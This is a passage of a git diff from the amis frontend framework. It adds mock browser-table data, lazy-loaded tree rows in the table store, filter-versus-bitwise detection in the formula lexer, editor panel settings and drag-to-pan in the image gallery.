+ { + engine: 'Webkit', + browser: 'Safari 3.0', + platform: 'OSX.4+', + version: '522.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'OmniWeb 5.5', + platform: 'OSX.4+', + version: '420', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'iPod Touch / iPhone', + platform: 'iPod', + version: '420.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'S60', + platform: 'S60', + version: '413', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.0', + platform: 'Win 95+ / OSX.1+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.0', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.0', + platform: 'Win 95+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.2', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.5', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera for Wii', + platform: 'Wii', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nokia N800', + platform: 'N800', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nintendo DS browser', + platform: 'Nintendo DS', + version: '8.5', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.1', + platform: 'KDE 3.1', + version: '3.1', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.3', + platform: 'KDE 3.3', + version: '3.3', + grade: 'A' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.5', + platform: 'KDE 3.5', + version: '3.5', + grade: 'A' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 4.5', + platform: 'Mac OS 8-9', + version: '-', + grade: 'X' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.1', + platform: 'Mac OS 7.6-9', + version: '1', + grade: 'C' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.2', + platform: 'Mac OS 8-X', + version: '1', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.1', + platform: 'Embedded devices', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.4', + platform: 'Embedded devices', + version: '-', + grade: 'A' + }, + { + engine: 'Misc', + browser: 'Dillo 0.8', + platform: 'Embedded devices', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Links', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Lynx', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'IE Mobile', + platform: 'Windows Mobile 6', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'PSP browser', + platform: 'PSP', + version: '-', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1, + children: + Math.random() > 0.5 + ? undefined + : [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (index + 1) * 100 + i + 1, + children: [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '1', + grade: 'A' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (i + 1) * 100 + (index + 1) * 1000 + i + 1 + }); + }) + }); + }) + }); +}); diff --git a/mock/cfc/mock/index.js b/mock/cfc/mock/index.js index a73d865ce..9b8fe1c3d 100755 --- a/mock/cfc/mock/index.js +++ b/mock/cfc/mock/index.js @@ -27,15 +27,20 @@ module.exports = function (req, res) { return require(file)(req, res); } else if (exist(jsFile)) { let file = require.resolve(path.join(DIRNAME, jsFile)); - delete require.cache[file]; + let mod = require(file); + + if (!mod.cache) { + delete require.cache[file]; + mod = require(file); + } if (req.query.waitSeconds) { return setTimeout(function () { - require(file)(req, res); + mod(req, res); }, parseInt(req.query.waitSeconds, 10) * 1000); } - return require(file)(req, res); + return mod(req, res); } if (exist(jsonFile)) { if (req.query.waitSeconds) { diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - "uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index e1f3db6a3..42b354875 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -39,6 +39,45 @@ import {getStoreById} from './manager'; */ const PARTITION_INDEX = 3; +function initChildren( + children: Array<any>, + depth: number, + pindex: number, + parentId: string, + path: string = '' +): any { + depth += 1; + return children.map((item, index) => { + item = isObject(item) + ? item + : { + item + }; + const id = item.__id ?? guid(); + + return { + // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), + id: String(id), + parentId: String(parentId), + key: String(`${pindex}-${depth}-${index}`), + path: `${path}${index}`, + depth: depth, + index: index, + newIndex: index, + pristine: item, + data: item, + defer: !!item.defer, + loaded: false, + loading: false, + rowSpans: {}, + children: + item && Array.isArray(item.children) + ? initChildren(item.children, depth, index, id, `${path}${index}.`) + : [] + }; + }); +} + export const Column = types .model('Column', { label: types.optional(types.frozen(), undefined), @@ -127,20 +166,33 @@ export const Row = types rowSpans: types.frozen({} as any), index: types.number, newIndex: types.number, - nth: 0, path: '', // 行数据的位置 - expandable: false, checkdisable: false, isHover: false, children: types.optional( types.array(types.late((): IAnyModelType => Row)), [] ), + defer: false, // 是否为懒数据 + loaded: false, // 懒数据是否加载完了 + loading: false, // 懒数据是否正在加载 + error: '', // 懒数据加载失败的错误信息 depth: types.number, // 当前children位于第几层,便于使用getParent获取最顶层TableStore appeared: true, lazyRender: false }) .views(self => ({ + get expandable(): boolean { + let table: any; + return !!( + (self && self.children.length) || + (self && self.defer && !self.loaded) || + ((table = getParent(self, self.depth * 2) as any) && + table.footable && + table.footableColumns.length) + ); + }, + get checked(): boolean { return (getParent(self, self.depth * 2) as ITableStore).isSelected( self as IRow @@ -320,36 +372,70 @@ export const Row = types }); if (Array.isArray(data.children)) { - const arr = data.children; - const pool = arr.concat(); + this.replaceChildren(data.children); + } + }, - // 把多的删了先 - if (self.children.length > arr.length) { - self.children.splice(arr.length, self.children.length - arr.length); - } + replaceChildren(children: Array<any>) { + const arr = children; + const pool = arr.concat(); - let index = 0; - const len = self.children.length; - while (pool.length) { - // 因为父级id未更新,所以需要将子级的parentId正确指向父级id - const item = { - ...pool.shift(), - parentId: self.id - }!; - - if (index < len) { - self.children[index].replaceWith(item); - } else { - const row = Row.create(item); - self.children.push(row); - } - index++; + // 把多的删了先 + if (self.children.length > arr.length) { + self.children.splice(arr.length, self.children.length - arr.length); + } + + let index = 0; + const len = self.children.length; + while (pool.length) { + // 因为父级id未更新,所以需要将子级的parentId正确指向父级id + const item = { + ...pool.shift(), + parentId: self.id + }!; + + if (index < len) { + self.children[index].replaceWith(item); + } else { + const row = Row.create(item); + self.children.push(row); } + index++; } }, markAppeared(value: any) { value && (self.appeared = !!value); + }, + + markLoading(value: any) { + self.loading = !!value; + }, + + markLoaded(value: any) { + self.loaded = !!value; + }, + + setError(value: any) { + self.error = String(value); + }, + + resetDefered() { + self.error = ''; + self.loaded = false; + }, + + setDeferData({children, ...rest}: any) { + self.data = { + ...self.data, + ...rest + }; + + if (Array.isArray(children)) { + this.replaceChildren( + initChildren(children, self.depth, self.index, self.id, self.path) + ); + } } })); @@ -1238,55 +1324,6 @@ export const TableStore = iRendererStore return combineCell(arr, keys); } - function initChildren( - children: Array<any>, - depth: number, - pindex: number, - parentId: string, - path: string = '', - nThRef: {index: number} - ): any { - depth += 1; - return children.map((item, index) => { - item = isObject(item) - ? item - : { - item - }; - const id = item.__id ?? guid(); - - return { - // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), - id: String(id), - parentId: String(parentId), - key: String(`${pindex}-${depth}-${index}`), - path: `${path}${index}`, - depth: depth, - index: index, - nth: nThRef.index++, - newIndex: index, - pristine: item, - data: item, - rowSpans: {}, - children: - item && Array.isArray(item.children) - ? initChildren( - item.children, - depth, - index, - id, - `${path}${index}.`, - nThRef - ) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) - }; - }); - } - function initRows( rows: Array<any>, getEntryId?: (entry: any, index: number) => string, @@ -1298,7 +1335,6 @@ export const TableStore = iRendererStore /* 避免输入内容为非数组挂掉 */ rows = !Array.isArray(rows) ? [] : rows; - const nThRef = {index: 0}; let arr: Array<SRow> = rows.map((item, index) => { if (!isObject(item)) { item = { @@ -1315,20 +1351,18 @@ export const TableStore = iRendererStore key: String(`${index}-1-${index}`), depth: 1, // 最大父节点默认为第一层,逐层叠加 index: index, - nth: nThRef.index++, newIndex: index, pristine: item, path: `${index}`, data: item, rowSpans: {}, + defer: !!item.defer, + loaded: false, + loading: false, children: item && Array.isArray(item.children) - ? initChildren(item.children, 1, index, id, `${index}.`, nThRef) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) + ? initChildren(item.children, 1, index, id, `${index}.`) + : [] }; }); @@ -1342,7 +1376,9 @@ export const TableStore = iRendererStore } replaceRow(arr, reUseRow); - self.isNested = self.rows.some(item => item.children.length); + self.isNested = self.rows.some( + item => item.children.length || (item.defer && !item.loaded) + ); // 前 20 个直接渲染,后面的按需渲染 if ( diff --git a/packages/amis-core/src/types.ts b/packages/amis-core/src/types.ts index 0133ae7d9..683a4406c 100644 --- a/packages/amis-core/src/types.ts +++ b/packages/amis-core/src/types.ts @@ -228,6 +228,11 @@ export interface ApiObject extends BaseApiObject { api: ApiObject, context: any ) => ApiObject | Promise<ApiObject>; + /** + * api 发送上下文,可以用来传递一些数据给 api 的 adaptor + * @readonly + */ + context?: any; /** 是否过滤为空字符串的 query 参数 */ filterEmptyQuery?: boolean; downloadFileName?: string; diff --git a/packages/amis-core/src/utils/api.ts b/packages/amis-core/src/utils/api.ts index bfea52cc4..e3f7004b8 100644 --- a/packages/amis-core/src/utils/api.ts +++ b/packages/amis-core/src/utils/api.ts @@ -478,6 +478,7 @@ export function wrapFetcher( options?: object ) { api = buildApi(api, data, options) as ApiObject; + (api as ApiObject).context = data; if (api.requestAdaptor) { debug('api', 'before requestAdaptor', api); diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index 10969f1b1..476171f7c 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -56,7 +56,7 @@ export function findOrCreateStyle(id: string, doc?: Document) { } export function insertStyle(style: string, id: string, doc?: Document) { - const varStyleTag = findOrCreateStyle(id, doc); + const varStyleTag = findOrCreateStyle('amis-' + id, doc); // bca-disable-line varStyleTag.innerHTML = style; @@ -348,7 +348,7 @@ export interface InsertCustomStyle { */ export function removeCustomStyle(type: string, id: string, doc?: Document) { const style = (doc || document).getElementById( - (type ? type + '-' : '') + id.replace('u:', '') + 'amis-' + (type ? type + '-' : '') + id.replace('u:', '') ); if (style) { style.remove(); diff --git a/packages/amis-editor/src/component/BaseControl.ts b/packages/amis-editor/src/component/BaseControl.ts index 2044e7eb2..db58792de 100644 --- a/packages/amis-editor/src/component/BaseControl.ts +++ b/packages/amis-editor/src/component/BaseControl.ts @@ -253,6 +253,7 @@ export const formItemControl: ( key: 'status', body: normalizeBodySchema( [ + getSchemaTpl('visible'), getSchemaTpl('hidden'), supportStatic ? getSchemaTpl('static') : null, // TODO: 下面的部分表单项才有,是不是判断一下是否是表单项 diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index 1c8e0d49e..ddf531ec2 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -1,7 +1,7 @@ import cx from 'classnames'; import flatten from 'lodash/flatten'; import cloneDeep from 'lodash/cloneDeep'; -import {isObject} from 'amis-core'; +import {isObject, getRendererByName} from 'amis-core'; import { BasePlugin, tipedLabel, @@ -783,29 +783,61 @@ export class FormPlugin extends BasePlugin { '设置后将让表单的第一个可输入的表单项获得焦点' ) }), - { - type: 'ae-switch-more', - mode: 'normal', + getSchemaTpl('switch', { name: 'persistData', label: tipedLabel( '本地缓存', '开启后,表单的数据会缓存在浏览器中,切换页面或关闭弹框不会清空当前表单内的数据' ), - hiddenOnDefault: true, - formType: 'extend', - form: { - body: [ - getSchemaTpl('switch', { - name: 'clearPersistDataAfterSubmit', - label: tipedLabel( - '提交成功后清空缓存', - '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' - ), - pipeIn: defaultValue(false), - visibleOn: 'data.persistData' - }) - ] - } + pipeIn: (value: boolean | string | undefined) => !!value + }), + { + type: 'container', + className: 'ae-ExtendMore mb-3', + visibleOn: 'data.persistData', + body: [ + getSchemaTpl('tplFormulaControl', { + name: 'persistData', + label: tipedLabel( + '持久化Key', + '使用静态数据或者变量:<code>"\\${id}"</code>,来为Form指定唯一的Key' + ), + pipeIn: (value: boolean | string | undefined) => + typeof value === 'string' ? value : '' + }), + { + type: 'input-array', + label: tipedLabel( + '保留字段集合', + '如果只需要保存Form中的部分字段值,请配置需要保存的字段名称集合,留空则保留全部字段' + ), + name: 'persistDataKeys', + items: { + type: 'input-text', + placeholder: '请输入字段名', + options: flatten(schema?.body ?? schema?.controls ?? []) + .map((item: Record<string, any>) => { + const isFormItem = getRendererByName( + item?.type + )?.isFormItem; + + return isFormItem && typeof item?.name === 'string' + ? {label: item.name, value: item.name} + : false; + }) + .filter(Boolean) + }, + itemClassName: 'bg-transparent' + }, + getSchemaTpl('switch', { + name: 'clearPersistDataAfterSubmit', + label: tipedLabel( + '提交成功后清空缓存', + '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' + ), + pipeIn: defaultValue(false) + }) + ] }, getSchemaTpl('switch', { name: 'canAccessSuperData', diff --git a/packages/amis-editor/src/plugin/Form/InputDate.tsx b/packages/amis-editor/src/plugin/Form/InputDate.tsx index 8c56e150c..62c80d2a5 100644 --- a/packages/amis-editor/src/plugin/Form/InputDate.tsx +++ b/packages/amis-editor/src/plugin/Form/InputDate.tsx @@ -293,7 +293,7 @@ export class DateControlPlugin extends BasePlugin { form.setValues({ placeholder: DateType[type]?.placeholder, - valueFormat: type === 'time' ? 'HH:mm' : 'X', + valueFormat: 'X', displayFormat: DateType[type]?.format, minDate: '', maxDate: '', @@ -308,7 +308,7 @@ export class DateControlPlugin extends BasePlugin { '值格式', '提交数据前将根据设定格式化数据,请参考 <a href="https://momentjs.com/" target="_blank">moment</a> 中的格式用法。' ), - pipeIn: defaultValue('YYYY-MM-DD'), + pipeIn: defaultValue('X'), clearable: true, onChange: ( value: string, diff --git a/packages/amis-editor/src/plugin/Form/InputNumber.tsx b/packages/amis-editor/src/plugin/Form/InputNumber.tsx index 601cfaaa3..a3b7cb8b4 100644 --- a/packages/amis-editor/src/plugin/Form/InputNumber.tsx +++ b/packages/amis-editor/src/plugin/Form/InputNumber.tsx @@ -223,7 +223,47 @@ export class NumberControlPlugin extends BasePlugin { }, getSchemaTpl('prefix'), getSchemaTpl('suffix'), - getSchemaTpl('keyValueMapControl'), + getSchemaTpl('combo-container', { + type: 'combo', + label: '单位选项', + mode: 'normal', + name: 'unitOptions', + items: [ + { + placeholder: '文本', + type: i18nEnabled ? 'input-text-i18n' : 'input-text', + name: 'label' + }, + { + placeholder: '值', + type: 'input-text', + name: 'value' + } + ], + draggable: false, + multiple: true, + pipeIn: (value: any) => { + if (Array.isArray(value)) { + return value.map(item => + typeof item === 'string' + ? { + label: item, + value: item + } + : item + ); + } + return []; + }, + pipeOut: (value: any[]) => { + if (!value.length) { + return undefined; + } + return value.map(item => + item.value ? item : {label: item.label, value: item.label} + ); + } + }), getSchemaTpl('labelRemark'), getSchemaTpl('remark'), getSchemaTpl('placeholder'), diff --git a/packages/amis-editor/src/plugin/Form/InputTable.tsx b/packages/amis-editor/src/plugin/Form/InputTable.tsx index 28f5b09dc..5449bf410 100644 --- a/packages/amis-editor/src/plugin/Form/InputTable.tsx +++ b/packages/amis-editor/src/plugin/Form/InputTable.tsx @@ -1004,34 +1004,7 @@ export class TableControlPlugin extends BasePlugin { }, getSchemaTpl('description'), getSchemaTpl('placeholder'), - getSchemaTpl('labelRemark'), - { - name: 'columnsTogglable', - label: tipedLabel( - '列显示开关', - '是否展示表格列的显隐控件,“自动”即列数量大于5时自动开启' - ), - type: 'button-group-select', - pipeIn: defaultValue('auto'), - size: 'sm', - labelAlign: 'left', - options: [ - { - label: '自动', - value: 'auto' - }, - - { - label: '开启', - value: true - }, - - { - label: '关闭', - value: false - } - ] - } + getSchemaTpl('labelRemark') ] }, { @@ -1064,6 +1037,43 @@ export class TableControlPlugin extends BasePlugin { { title: '外观', body: getSchemaTpl('collapseGroup', [ + { + title: '基本', + body: [ + { + name: 'columnsTogglable', + label: tipedLabel( + '列显示开关', + '是否展示表格列的显隐控件,“自动”即列数量大于5时自动开启' + ), + type: 'button-group-select', + pipeIn: defaultValue('auto'), + size: 'sm', + labelAlign: 'left', + options: [ + { + label: '自动', + value: 'auto' + }, + + { + label: '开启', + value: true + }, + + { + label: '关闭', + value: false + } + ] + }, + getSchemaTpl('switch', { + name: 'affixHeader', + label: '是否固定表头', + pipeIn: defaultValue(false) + }) + ] + }, getSchemaTpl('style:formItem', {renderer: context.info.renderer}), getSchemaTpl('style:classNames', { schema: [ diff --git a/packages/amis-editor/src/plugin/Nav.tsx b/packages/amis-editor/src/plugin/Nav.tsx index 86c6b59ba..0b68a7582 100644 --- a/packages/amis-editor/src/plugin/Nav.tsx +++ b/packages/amis-editor/src/plugin/Nav.tsx @@ -378,7 +378,7 @@ export class NavPlugin extends BasePlugin { // }, { title: '状态', - body: [getSchemaTpl('hidden')] + body: [getSchemaTpl('visible'), getSchemaTpl('hidden')] } ]) }, diff --git a/packages/amis-editor/src/plugin/Progress.tsx b/packages/amis-editor/src/plugin/Progress.tsx index 36b97a4dd..5fe38087e 100644 --- a/packages/amis-editor/src/plugin/Progress.tsx +++ b/packages/amis-editor/src/plugin/Progress.tsx @@ -92,26 +92,6 @@ export class ProgressPlugin extends BasePlugin { needDeleteProps: ['placeholder'], valueType: 'number' // 期望数值类型,不过 amis中会尝试字符串 trans 数值类型 }), - getSchemaTpl('menuTpl', { - label: tipedLabel( - '数值模板', - '值渲染模板,支持JSX、数据域变量使用, 默认 ${value}%' - ), - name: 'valueTpl', - variables: [ - { - label: '值字段', - children: [ - { - label: '进度值', - value: 'value', - tag: 'number' - } - ] - } - ], - requiredDataPropsVariables: true - }), getSchemaTpl('switch', { name: 'showLabel', diff --git a/packages/amis-editor/src/plugin/Service.tsx b/packages/amis-editor/src/plugin/Service.tsx index 47e7088a6..f98aba51a 100644 --- a/packages/amis-editor/src/plugin/Service.tsx +++ b/packages/amis-editor/src/plugin/Service.tsx @@ -273,7 +273,7 @@ export class ServicePlugin extends BasePlugin { }, { title: '状态', - body: [getSchemaTpl('hidden')] + body: [getSchemaTpl('visible'), getSchemaTpl('hidden')] }, { title: '高级', diff --git a/packages/amis-editor/src/tpl/common.tsx b/packages/amis-editor/src/tpl/common.tsx index aa1b95342..1b2d97193 100644 --- a/packages/amis-editor/src/tpl/common.tsx +++ b/packages/amis-editor/src/tpl/common.tsx @@ -792,7 +792,7 @@ setSchemaTpl( return { title: '状态', body: [ - getSchemaTpl('newVisible'), + getSchemaTpl('visible'), getSchemaTpl('hidden'), !config?.unsupportStatic && config?.isFormItem ? getSchemaTpl('static') @@ -878,17 +878,6 @@ setSchemaTpl('static', { expressionName: 'staticOn' }); -// 新版配置面板兼容 [可见] 状态 -setSchemaTpl('newVisible', { - type: 'ae-StatusControl', - label: '可见', - mode: 'normal', - name: 'visible', - expressionName: 'visibleOn', - visibleOn: - 'data.visible || data.visible === false || data.visibleOn !== undefined' -}); - setSchemaTpl('hidden', { type: 'ae-StatusControl', label: '隐藏', diff --git a/packages/amis-editor/src/tpl/options.tsx b/packages/amis-editor/src/tpl/options.tsx index 06920b49e..0b507d6f6 100644 --- a/packages/amis-editor/src/tpl/options.tsx +++ b/packages/amis-editor/src/tpl/options.tsx @@ -739,13 +739,3 @@ setSchemaTpl('optionDeleteControl', (params: OptionControlParams) => { } }); }); - -/** - * key value映射类组件 - */ -setSchemaTpl('keyValueMapControl', { - type: 'ae-keyValueMapControl', - label: '单位选项', - name: 'unitOptions', - mode: 'normal' -}); diff --git a/packages/amis-formula/src/lexer.ts b/packages/amis-formula/src/lexer.ts index c48b878c4..18a5288ae 100644 --- a/packages/amis-formula/src/lexer.ts +++ b/packages/amis-formula/src/lexer.ts @@ -1,3 +1,4 @@ +import {getFilters} from './filter'; import {LexerOptions, Token, TokenTypeName} from './types'; export const enum TokenEnum { @@ -171,16 +172,25 @@ function formatNumber(value: string) { return Number(value); } -export function lexer(input: string, options?: LexerOptions) { +export function lexer(input: string, options: LexerOptions = {}) { let line = 1; let column = 1; let index = 0; let mainState = mainStates.START; const states: Array<any> = [mainState]; let tokenCache: Array<Token> = []; - const allowFilter = options?.allowFilter !== false; + options = {...options}; + const allowFilter = options.allowFilter !== false; - if (options?.evalMode || options?.variableMode) { + if (!options.isFilter) { + const filterKeys = Object.keys(getFilters()); + if ((options as any).filters) { + filterKeys.push(...Object.keys((options as any).filters)); + } + options.isFilter = (name: string) => filterKeys.includes(name); + } + + if (options.evalMode || options.variableMode) { pushState(mainStates.EXPRESSION); } @@ -370,6 +380,16 @@ export function lexer(input: string, options?: LexerOptions) { token.value === '|' && allowFilter ) { + // 怎么区分是过滤还是位运算呢? + // 靠外面反馈吧 + if (options?.isFilter) { + const restInput = input.substring(token.start.index + 1).trim(); + const m = /^[A-Za-z0-9_$@][A-Za-z0-9_\-$@]*/.exec(restInput); + if (!m || !options.isFilter(m[0])) { + return token; + } + } + pushState(mainStates.Filter); return { type: TokenName[TokenEnum.OpenFilter], diff --git a/packages/amis-formula/src/types.ts b/packages/amis-formula/src/types.ts index 39c967bff..a675707ff 100644 --- a/packages/amis-formula/src/types.ts +++ b/packages/amis-formula/src/types.ts @@ -61,6 +61,8 @@ export interface LexerOptions { * ${abc | html} */ allowFilter?: boolean; + + isFilter?: (name: string) => boolean; } export type TokenTypeName = diff --git a/packages/amis-ui/scss/components/_image-gallery.scss b/packages/amis-ui/scss/components/_image-gallery.scss index 54dfee091..ad4c2b075 100644 --- a/packages/amis-ui/scss/components/_image-gallery.scss +++ b/packages/amis-ui/scss/components/_image-gallery.scss @@ -54,13 +54,22 @@ justify-content: center; align-items: center; user-select: none; + overflow: hidden; > img { + cursor: move; + cursor: -webkit-grab; display: block; max-width: 100%; max-height: 100%; transition: transform 0.3s cubic-bezier(0, 0, 0.25, 1) 0s; } + + &.is-dragging > img { + transition: none; + user-select: none; + cursor: -webkit-grabbing; + } } &-prevBtn, @@ -216,6 +225,7 @@ .#{$ns}ImageGallery-toolbar { background-color: var(--image-images-preview-bgColor); border-radius: var(--image-images-preview-radius); + box-shadow: 0 2px 6px 0 rgba(211, 211, 211, 0.5); display: flex; align-items: flex-start; padding: var(--image-images-preview-paddingTop) diff --git a/packages/amis-ui/scss/components/_table.scss b/packages/amis-ui/scss/components/_table.scss index b0976d487..d93fd7ab9 100644 --- a/packages/amis-ui/scss/components/_table.scss +++ b/packages/amis-ui/scss/components/_table.scss @@ -620,6 +620,10 @@ > thead > tr > th.#{$ns}Table-primayCell, > tbody > tr > td.#{$ns}Table-primayCell { white-space: nowrap; // 树形表格展示标题栏,不要换行 + + > .#{$ns}Spinner { + vertical-align: middle; + } } } @@ -864,6 +868,14 @@ } } + &-retryBtn { + color: var(--Form-feedBack-color); + cursor: pointer; + &:hover { + color: var(--Form-feedBack-color); + } + } + &-expandBtn, &-expandBtn2 { position: relative; diff --git a/packages/amis-ui/scss/components/form/_tree.scss b/packages/amis-ui/scss/components/form/_tree.scss index 397dc5d1e..7f6feee9f 100644 --- a/packages/amis-ui/scss/components/form/_tree.scss +++ b/packages/amis-ui/scss/components/form/_tree.scss @@ -199,6 +199,7 @@ height: var(--Tree-itemHeight); line-height: var(--Tree-itemHeight); padding-right: var(--Tree-icon-gap); + flex-shrink: 0; > a { display: inline-block; @@ -359,7 +360,6 @@ &-itemText { cursor: pointer; - flex: 1 auto; display: inline-block; color: var(--inputTree-base-default-color); font-size: var(--select-tree-fontSize); diff --git a/packages/amis-ui/src/components/ImageGallery.tsx b/packages/amis-ui/src/components/ImageGallery.tsx index 9500ede08..1dda61f62 100644 --- a/packages/amis-ui/src/components/ImageGallery.tsx +++ b/packages/amis-ui/src/components/ImageGallery.tsx @@ -49,6 +49,14 @@ export interface ImageGalleryState { scale: number; /** 图片旋转角度 */ rotate: number; + /** + * 水平位移 + */ + tx: number; + /** + * 垂直位移 + */ + ty: number; /** 是否开启操作栏 */ showToolbar?: boolean; /** 是否显示底部图片集 */ @@ -89,6 +97,8 @@ export class ImageGallery extends React.Component< isOpened: false, index: -1, items: [], + tx: 0, + ty: 0, scale: 1, rotate: 0, showToolbar: false, @@ -103,8 +113,10 @@ export class ImageGallery extends React.Component< ref.addEventListener('wheel', this.onWheelScroll, { passive: false }); + ref.addEventListener('mousedown', this.onMouseDown); } else { this.galleryMain?.removeEventListener('wheel', this.onWheelScroll); + this.galleryMain?.removeEventListener('mousedown', this.onMouseDown); } this.galleryMain = ref; @@ -128,6 +140,38 @@ export class ImageGallery extends React.Component< } } + startX = 0; + startY = 0; + startTx = 0; + startTy = 0; + + @autobind + onMouseDown(event: MouseEvent) { + this.galleryMain?.classList.add('is-dragging'); + document.body.addEventListener('mousemove', this.onMouseMove); + document.body.addEventListener('mouseup', this.onMouseUp); + + this.startX = event.clientX; + this.startY = event.clientY; + this.startTx = this.state.tx; + this.startTy = this.state.ty; + } + + @autobind + onMouseMove(event: MouseEvent) { + this.setState({ + tx: this.startTx + event.clientX - this.startX, + ty: this.startTy + event.clientY - this.startY + }); + } + + @autobind + onMouseUp() { + this.galleryMain?.classList.remove('is-dragging'); + document.body.removeEventListener('mousemove', this.onMouseMove); + document.body.removeEventListener('mouseup', this.onMouseUp); + } + @autobind handleImageEnlarge(info: { src: string; @@ -151,6 +195,10 @@ export class ImageGallery extends React.Component< this.setState({ isOpened: true, + tx: 0, + ty: 0, + rotate: 0, + scale: 1, items: info.list ? info.list : [info], index: info.index || 0, /* children组件可以控制工具栏的展示 */ @@ -207,23 +255,35 @@ export class ImageGallery extends React.Component< switch (action.key) { case ImageActionKey.ROTATE_LEFT: - this.setState(prevState => ({rotate: prevState.rotate - 90})); + this.setState(prevState => ({ + rotate: prevState.rotate - 90, + tx: 0, + ty: 0 